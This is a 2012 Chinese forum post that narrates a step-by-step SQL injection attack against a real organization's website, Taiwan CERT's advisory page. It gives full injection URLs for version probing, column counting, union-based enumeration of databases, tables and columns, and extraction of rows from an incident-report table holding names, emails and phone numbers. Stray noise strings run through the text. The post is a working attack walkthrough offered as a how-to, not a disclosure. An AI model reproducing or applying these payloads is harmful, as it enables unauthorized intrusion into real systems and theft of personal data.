1.判断版本http://www.cert.org.tw/document/advisory/detail.php?id=7 and ord(mid(version(),1,1))>51 返回正常,说明大于4.0版本,支持ounion查询9 T" }9 K6 _8 @, I! k0 s5 j$ ]
2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解
# r& {) {/ T/ Q! t# g, w+ Xhttp://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,2,3,4,5,6,7,8,9--- X& d+ d# K5 V ^* q
3.查看数据库版本及当前用户,http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,user(),version(),4,5,6,7,8,9--
& J0 t. ?" i. b: q( [数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,有待牛人去考证。9 A7 W2 }1 s9 @( o( x( V' \
4.判断有没有写权限; m/ {+ r# r5 v+ l
http://www.cert.org.tw/document/advisory/detail.php?id=7 and (select count(*) from MySQL.user)>0-- 返回错误,没有写权限 n( s) W* L9 s% G, G8 w! ~
没办法,手动猜表啦* c5 j2 U% F- z, q
5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,17 n: C& @) x# x% l' {2 W$ l5 L
但是这个点有点不争气,用不了这个命令,就学习了下土耳其黑客的手法,不多说,如下; q1 c v) J+ t* M
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--
$ R+ Z7 C7 ^: M7 c成功查出所有数据库,国外的黑客就是不一般。数据库如下:
5 }" [! A% a/ E2 x2 H9 ninformation_schema,Advisory,IR,mad,member,mysql,twcert,vuldb,vulscandb
]. O& i: X& N) m- d6.爆表,爆的是twcert库
5 `# N( Y& C* T; Thttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--
5 M) }7 v0 ]. m( @爆出如下表
) N( \! v) G) }downloadfile,irsys,newsdata,secrpt,secrpt_big58 f# I$ q9 B9 M% B" k
7.爆列名,这次爆的是irsys表) } i, J0 B( [9 Q7 N0 {
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--
, M5 l8 U4 P+ F( k6 k# K爆出如下列7 e0 |' u* I5 R/ U3 W/ m4 h# J5 q
ir_id,name,company,email,tel,pubdate,rptdep,eventtype,eventdesc,machineinfo,procflow,memo,filename,systype,status: C' W/ N& L* T& g
8.查询字段数,到这一步,国内很少有黑客去查询字段数的,直接用limit N,1去查询,直接N到报错为止。$ T& r$ J( G& N8 X
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--; M0 J$ w- r1 g2 d$ Z0 I
返回是3,说明每个列里有3个地段
% O' A' V! ]: X) x. k9.爆字段内容/ L; A, W2 ?. h) I4 t
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--$ n* @2 O% w- M
爆出name列的第一个字段的内容. o' |$ u1 L2 X! ]9 |' M
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--
1 [7 |; f) ^8 E$ G+ N# _( L爆出name列的第二个字段的内容 |
发表于 2012-9-13 17:57:04
收藏
支持
反对